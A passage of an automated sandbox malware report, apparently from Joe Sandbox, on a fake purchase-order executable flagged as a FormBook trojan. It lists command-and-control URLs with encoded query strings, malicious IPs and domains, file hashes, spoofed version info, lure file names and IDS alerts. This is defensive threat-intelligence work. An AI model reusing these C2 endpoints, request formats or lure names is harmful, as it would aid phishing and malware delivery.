https://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU	WWAHost.exe, 0000000A.00000002.477885883.0000000003D32000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.218.97	handybusy.com	United States	46606	UNIFIEDLAYER-AS-1US	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
34.102.136.180	theassistedadrscheme.com	United States	15169	GOOGLEUS	false
160.153.138.219	indiadesignstory.com	United States	21501	GODADDY-AMSDE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458861
Start date:	03.08.2021
Start time:	20:10:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Nouveau bon de commande. 3007021_pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@12/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 65.6% (good quality ratio 61.2%) Quality average: 72% Quality standard deviation: 30.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 63 Number of non-executed functions: 134
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.255.188.83, 20.82.209.183, 23.35.236.56, 40.112.88.60, 20.82.210.154, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:11:25	API Interceptor	1x Sleep call for process: Nouveau bon de commande. 3007021_pdf.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
23.227.38.74	Purchase Requirements.exe	Get hash	malicious	Browse	www.thefitflect.com/n8ba/?YDKPpTg0=OvBvP1Su9fWFY0UPkW0anmpJM9mANCcukNJzgBj3kCnMbGPnYOnff5N4Ec4XgmlqGLmb&FHtx=1bcPl8l0PFatcZcp
	Form_TT_EUR57,890.exe	Get hash	malicious	Browse	www.trendyheld.com/6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8
	INV NO-1820000514 USD 270,294.pdf.exe	Get hash	malicious	Browse	www.saletshirtonline.net/vtg0/?2d2hhfX=wLM7yM5qIIdfZe6bPcD5+tH9HS6HIdKxsDGDeiTUWIc3xI5y5L9vfJDJMr8bE3UHW7IY&Uf=Vdm4RdxXY4ad4
	payment copy.exe	Get hash	malicious	Browse	www.go-rillathebrand.com/grve/?k4zl7v=+aJGkTYs+v5qwgDAZYrAiqdMmvOKV8L40B89/S9Al34dlMYhgyT3r4n/526+lwfpvND+&LZ=7nAhDZ0Pqxa
	PO_0008.exe	Get hash	malicious	Browse	www.miracle-tone.com/usvr/?T4Vtm=qT8HIASLzdvgtPuSqeC+SgFU6QHrW9xLc1n9hn/9kejyrORZzjqAW1EWdwGWEIWNFMmS&mD=3f2XLdWh
	i9Na8iof4G.exe	Get hash	malicious	Browse	www.rootmoover.com/wufn/?7n=pDKh8nopV2b0&-ZYx-=jUqWC+wOjrrnf2CQrj52syV+yALdMbb6PeVmesdIWlCxWErNj937WU588MC4hnh1Hp0+ODAGVw==
	bin.exe	Get hash	malicious	Browse	www.shoppinkksugar.com/cvrn/?9rSx00op=Iu6dEYykmYBZDVkHqoWf7UFcij5h1gP9UVpQoOFFQSHjdyZzHlZY1xDiEpj6UByo6tZJCBzf0A==&StT=FR-8dxEhSB
	Payment For Invoice 321-1005703.exe	Get hash	malicious	Browse	www.themummymarketplace.com/fznn/?e0GHc8YP=knTPA+f9tKCZdl8AXg9m87w6tnYHDJqknKET7CvX32Y80YefcE1IwqZdAZ2fl6ctn9k4&9rg=00GTJt
	RYP-210712.xlsx	Get hash	malicious	Browse	www.riveraitc.com/6mam/?TP=SnhjisI/g941tYnedO532EwcXneBDaw7KeLS1bDcRf/9DFIScc8FKDp/bNw9aZvGYlrq4Q==&O2M0W=yVJpjpi8601X
	INV NO-1820000514 USD 270,294.pdf.exe	Get hash	malicious	Browse	www.saletshirtonline.net/vtg0/?8pcx=wLM7yM5qIIdfZe6bPcD5+tH9HS6HIdKxsDGDeiTUWIc3xI5y5L9vfJDJMr8xbHkHS5AY&b8Zd=YdoHsDD
	auhToVTQTs.exe	Get hash	malicious	Browse	www.essentiallyourscandles.com/p2io/?LhZlTrE=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjoHtKIVmiR&VN=1bQLqD
	Invoice Amount 14980.exe	Get hash	malicious	Browse	www.slingmodeinc.com/p4se/?7npd928=D5A61tOYXACBJnTTL6EuJjOFOrzb7pToer6ROMogPofjrPCD8Igj7Qs9clmkcP0LoyCpBDdung==&U2M=m0GHc
	W7f.PDF.exe	Get hash	malicious	Browse	www.serenityeternity.com/ushb/?-ZT=4hqHR&3feDA=59BDWT+RfSt3SBSoc1bHtk+fi9zzfb2ZkmW634jeoVZ5ZNJtsds46fXGn58sLk1vYRmK
	Order Signed PEARLTECH contract and PO.exe	Get hash	malicious	Browse	www.shopinnocenceeyejai.com/um8e/?oT60=5js4&khX81N=xH37aAVzz87XJyJmDmcM72NNpTFjNoYi38LK6Cm6aAvAgv0ee8djzuC2F/V3G7HCeXQO
	MR# RFx 21-2034021.exe	Get hash	malicious	Browse	www.isbpestcontrol.com/wt5i/?gPJtvx=4hQLbd7p5RaTuHV&k6AT-2H=zGMYFR67lDE2HH6Vm1zczZHcFL0qym+4qYTJbpMzh4zr6+Zy1hBqKi2vQzUiwesLouDL
	AWB & Shipping Tracking Details.exe	Get hash	malicious	Browse	www.mrbeagleshop.com/iuem/?A48t=Y8eiPa/Nz3UJvAERzDFlMhabbaOL1i+JuDXOTMHO4J5NnUwqavKtuVQDaAM2tTgSlsfk&nN=1bVtlz
	ORDER -RFQ#-TEOS1909061 40HC 21T05 DALIAN.doc	Get hash	malicious	Browse	www.yummylipz.net/b8eu/?5jLxCj7=BJsIvBSZAMM8O3qnTBySesvKf4cy5ptvtRL/e7MsGjTsJ8iq89FIxm8C2ebAarH9of/FaA==&S48H=-ZSXKLQ8r2B4yP
	Nsda7LTM1x.exe	Get hash	malicious	Browse	www.rootmoover.com/wufn/?VFNXjbnp=jUqWC+wOjrrnf2CQrj52syV+yALdMbb6PeVmesdIWlCxWErNj937WU588MO4y3t2e50o&R0GP=g0Dt1dZH_
	ORDER78827.doc	Get hash	malicious	Browse	www.timelessthots.com/b82a/?bTcT=0bhHK4GPMBVHoFX&R8SL=+W4cVHxaRfYtj0YDCK6op++cHV2wfF4HiTGeqDXvDBZfFEYSHEbLIPAcuPNF3olTRIFT3g==
	D3ccF8FfwAXrqsU.exe	Get hash	malicious	Browse	www.themummymarketplace.com/fznn/?0x=knTPA+f9tKCZdl8AXg9m87w6tnYHDJqknKET7CvX32Y80YefcE1IwqZdAaWl1r8V9aF/&S8DhyH=5jU4g2_HxF

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
shops.myshopify.com	Purchase Requirements.exe	Get hash	malicious	Browse	23.227.38.74
	Form_TT_EUR57,890.exe	Get hash	malicious	Browse	23.227.38.74
	INV NO-1820000514 USD 270,294.pdf.exe	Get hash	malicious	Browse	23.227.38.74
	payment copy.exe	Get hash	malicious	Browse	23.227.38.74
	PO_0008.exe	Get hash	malicious	Browse	23.227.38.74
	i9Na8iof4G.exe	Get hash	malicious	Browse	23.227.38.74
	bin.exe	Get hash	malicious	Browse	23.227.38.74
	Payment For Invoice 321-1005703.exe	Get hash	malicious	Browse	23.227.38.74
	RYP-210712.xlsx	Get hash	malicious	Browse	23.227.38.74
	INV NO-1820000514 USD 270,294.pdf.exe	Get hash	malicious	Browse	23.227.38.74
	auhToVTQTs.exe	Get hash	malicious	Browse	23.227.38.74
	kKTeUAtiIP.exe	Get hash	malicious	Browse	23.227.38.74
	Invoice Amount 14980.exe	Get hash	malicious	Browse	23.227.38.74
	W7f.PDF.exe	Get hash	malicious	Browse	23.227.38.74
	Order Signed PEARLTECH contract and PO.exe	Get hash	malicious	Browse	23.227.38.74
	MR# RFx 21-2034021.exe	Get hash	malicious	Browse	23.227.38.74
	AWB & Shipping Tracking Details.exe	Get hash	malicious	Browse	23.227.38.74
	ORDER -RFQ#-TEOS1909061 40HC 21T05 DALIAN.doc	Get hash	malicious	Browse	23.227.38.74
	Nsda7LTM1x.exe	Get hash	malicious	Browse	23.227.38.74
	ORDER78827.doc	Get hash	malicious	Browse	23.227.38.74

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	wuxvGLNrxG.jar	Get hash	malicious	Browse	162.241.216.53
	Amaury.vanvinckenroye-AudioMessage_520498.htm	Get hash	malicious	Browse	192.185.138.88
	transferred $95,934.55 pdf.exe	Get hash	malicious	Browse	50.87.146.49
	rL3Wx4zKD4.exe	Get hash	malicious	Browse	74.220.199.6
	hD72Gd3THG.exe	Get hash	malicious	Browse	67.20.76.71
	Products Order38899999.exe	Get hash	malicious	Browse	50.87.146.199
	ORDER_0009_PDF.exe	Get hash	malicious	Browse	74.220.199.6
	WWTLJo3vxn.exe	Get hash	malicious	Browse	192.254.235.241
	INV. 736392 Scan pdf.exe	Get hash	malicious	Browse	192.185.164.148
	7nNtjBvhrm	Get hash	malicious	Browse	142.7.147.90
	Purchase Requirements.exe	Get hash	malicious	Browse	192.185.0.218
	#Ud83d#Udda8 FaxMail dir -INV 000087.html	Get hash	malicious	Browse	162.241.217.69
	Products Order.exe	Get hash	malicious	Browse	50.87.146.199
	zerYOlEkZR.exe	Get hash	malicious	Browse	192.254.235.241
	PO-K-128 IAN 340854.exe	Get hash	malicious	Browse	192.185.90.36
	csa customers.xlsx	Get hash	malicious	Browse	162.241.217.138
	ENXcmU1LzQ.exe	Get hash	malicious	Browse	108.167.158.96
	Payment For Invoice 321-1005703.exe	Get hash	malicious	Browse	192.185.0.218
	Medical Equipment Order 2021.PDF.exe	Get hash	malicious	Browse	74.220.199.6
	S4M4QpXfnn.exe	Get hash	malicious	Browse	173.254.56.16
CLOUDFLARENETUS	MFS0175, MFS0117 MFS0194.exe	Get hash	malicious	Browse	172.67.188.154
	ORIGINAL PROFORMA INVOICE COAU7220898130,PDF.exe	Get hash	malicious	Browse	172.67.176.89
	Purchase Requirements.exe	Get hash	malicious	Browse	23.227.38.74
	items.doc	Get hash	malicious	Browse	104.21.19.200
	ZI09484474344.exe	Get hash	malicious	Browse	104.21.49.41
	#Ud83d#Udda8rocket.com 7335931#Ufffd90-queue-1675.htm	Get hash	malicious	Browse	104.16.19.94
	ATT66004.HTM	Get hash	malicious	Browse	104.16.19.94
	JUP2A9ptp5.exe	Get hash	malicious	Browse	104.21.19.200
	7vd7MuxjGd.exe	Get hash	malicious	Browse	104.21.92.87
	xar2.dll	Get hash	malicious	Browse	172.67.70.134
	Form_TT_EUR57,890.exe	Get hash	malicious	Browse	23.227.38.74
	BadFile.HTM	Get hash	malicious	Browse	104.16.18.94
	Stolen Images Evidence.js	Get hash	malicious	Browse	104.21.95.9
	LOPEZ CV.exe	Get hash	malicious	Browse	104.21.19.200
	Stolen Images Evidence.js	Get hash	malicious	Browse	104.21.95.9
	INV NO-1820000514 USD 270,294.pdf.exe	Get hash	malicious	Browse	23.227.38.74
	banload.msi	Get hash	malicious	Browse	104.23.98.190
	PO_1994.exe	Get hash	malicious	Browse	172.67.188.154
	bothlee2010.exe	Get hash	malicious	Browse	172.65.232.115
	D0CUMENT DE ENV#U00cdO.pdf.exe	Get hash	malicious	Browse	104.21.39.75

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nouveau bon de commande. 3007021_pdf.exe.log Download File
Process:	C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.7739369111242835
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Nouveau bon de commande. 3007021_pdf.exe
File size:	1327104
MD5:	e1d1316d5bc047ec817b950286734ed0
SHA1:	ae3cb4a0103f8daa9ec8f6dc00b6bfeb3f1c52ca
SHA256:	6fd8c63bf53f7364e54505eb98e1b6fc005fbb691a65680e400e7b9104ad1795
SHA512:	88a8f1555bc906728a9ab429899e2ae7d5eefa57128072607423cca26e36044160f6383f3568a581a786780a6a0fdd54cf13b9222c550dc6e66b8994fcc2b168
SSDEEP:	24576:gzeFrYS/d3kYdkhlOAnxHRrjz+LVL+eQBDmwRGPoN7vdiTbnFM:5H2lOAnxHRrjz+ZL+eum/PoiM
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............P..6..........6S... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x545336
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6103A4B4 [Fri Jul 30 07:05:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1452e4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x146000	0x5f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x148000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x14359c	0x143600	False	0.86088117873	data	7.77818810762	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x146000	0x5f0	0x600	False	0.445963541667	data	4.25972931821	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x148000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x146090	0x360	data
RT_MANIFEST	0x146400	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	TeamViewer 2021 (C)
Assembly Version	4.2.2.0
InternalName	TRACEENABLEIN.exe
FileVersion	4.3.0.6
CompanyName	TeamViewer GmBh
LegalTrademarks
Comments
ProductName	Game Picture
ProductVersion	4.3.0.6
FileDescription	Game Picture
OriginalFilename	TRACEENABLEIN.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/03/21-20:12:27.500344	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49738	23.227.38.74	192.168.2.3
08/03/21-20:12:42.716824	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49741	80	192.168.2.3	23.227.38.74
08/03/21-20:12:42.716824	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49741	80	192.168.2.3	23.227.38.74
08/03/21-20:12:42.716824	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49741	80	192.168.2.3	23.227.38.74
08/03/21-20:12:42.819216	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49741	23.227.38.74	192.168.2.3
08/03/21-20:12:53.832051	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49743	34.102.136.180	192.168.2.3
08/03/21-20:13:09.239820	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49745	34.102.136.180	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 20:12:27.436156988 CEST	49738	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:27.453243971 CEST	80	49738	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:27.453488111 CEST	49738	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:27.453727007 CEST	49738	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:27.472434044 CEST	80	49738	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:27.500344038 CEST	80	49738	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:27.500381947 CEST	80	49738	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:27.500394106 CEST	80	49738	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:27.500406027 CEST	80	49738	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:27.500422955 CEST	80	49738	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:27.500665903 CEST	49738	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:27.500876904 CEST	49738	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:27.501168013 CEST	80	49738	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:27.501276970 CEST	49738	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:42.699892044 CEST	49741	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:42.716492891 CEST	80	49741	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:42.716787100 CEST	49741	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:42.716824055 CEST	49741	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:42.733342886 CEST	80	49741	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:42.819216013 CEST	80	49741	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:42.819238901 CEST	80	49741	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:42.819264889 CEST	80	49741	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:42.819279909 CEST	80	49741	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:42.819307089 CEST	80	49741	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:42.819319010 CEST	80	49741	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:42.819325924 CEST	80	49741	23.227.38.74	192.168.2.3
Aug 3, 2021 20:12:42.819672108 CEST	49741	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:42.819794893 CEST	49741	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:42.819813013 CEST	49741	80	192.168.2.3	23.227.38.74
Aug 3, 2021 20:12:47.996292114 CEST	49742	80	192.168.2.3	162.241.218.97
Aug 3, 2021 20:12:48.130711079 CEST	80	49742	162.241.218.97	192.168.2.3
Aug 3, 2021 20:12:48.130918026 CEST	49742	80	192.168.2.3	162.241.218.97
Aug 3, 2021 20:12:48.131254911 CEST	49742	80	192.168.2.3	162.241.218.97
Aug 3, 2021 20:12:48.265563011 CEST	80	49742	162.241.218.97	192.168.2.3
Aug 3, 2021 20:12:48.639825106 CEST	49742	80	192.168.2.3	162.241.218.97
Aug 3, 2021 20:12:48.816730976 CEST	80	49742	162.241.218.97	192.168.2.3
Aug 3, 2021 20:12:49.884164095 CEST	80	49742	162.241.218.97	192.168.2.3
Aug 3, 2021 20:12:49.884192944 CEST	80	49742	162.241.218.97	192.168.2.3
Aug 3, 2021 20:12:49.884237051 CEST	49742	80	192.168.2.3	162.241.218.97
Aug 3, 2021 20:12:49.884274960 CEST	49742	80	192.168.2.3	162.241.218.97
Aug 3, 2021 20:12:53.700675964 CEST	49743	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:12:53.718132019 CEST	80	49743	34.102.136.180	192.168.2.3
Aug 3, 2021 20:12:53.718368053 CEST	49743	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:12:53.718667030 CEST	49743	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:12:53.736108065 CEST	80	49743	34.102.136.180	192.168.2.3
Aug 3, 2021 20:12:53.832051039 CEST	80	49743	34.102.136.180	192.168.2.3
Aug 3, 2021 20:12:53.832240105 CEST	80	49743	34.102.136.180	192.168.2.3
Aug 3, 2021 20:12:53.832550049 CEST	49743	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:12:53.832717896 CEST	49743	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:12:54.140171051 CEST	49743	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:12:54.157627106 CEST	80	49743	34.102.136.180	192.168.2.3
Aug 3, 2021 20:12:58.891522884 CEST	49744	80	192.168.2.3	160.153.138.219
Aug 3, 2021 20:12:58.918148994 CEST	80	49744	160.153.138.219	192.168.2.3
Aug 3, 2021 20:12:58.918302059 CEST	49744	80	192.168.2.3	160.153.138.219
Aug 3, 2021 20:12:58.918533087 CEST	49744	80	192.168.2.3	160.153.138.219
Aug 3, 2021 20:12:58.958533049 CEST	80	49744	160.153.138.219	192.168.2.3
Aug 3, 2021 20:12:58.958698988 CEST	49744	80	192.168.2.3	160.153.138.219
Aug 3, 2021 20:12:58.958794117 CEST	49744	80	192.168.2.3	160.153.138.219
Aug 3, 2021 20:12:58.985282898 CEST	80	49744	160.153.138.219	192.168.2.3
Aug 3, 2021 20:13:09.108089924 CEST	49745	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:13:09.125828981 CEST	80	49745	34.102.136.180	192.168.2.3
Aug 3, 2021 20:13:09.125950098 CEST	49745	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:13:09.126152992 CEST	49745	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:13:09.143661976 CEST	80	49745	34.102.136.180	192.168.2.3
Aug 3, 2021 20:13:09.239820004 CEST	80	49745	34.102.136.180	192.168.2.3
Aug 3, 2021 20:13:09.239846945 CEST	80	49745	34.102.136.180	192.168.2.3
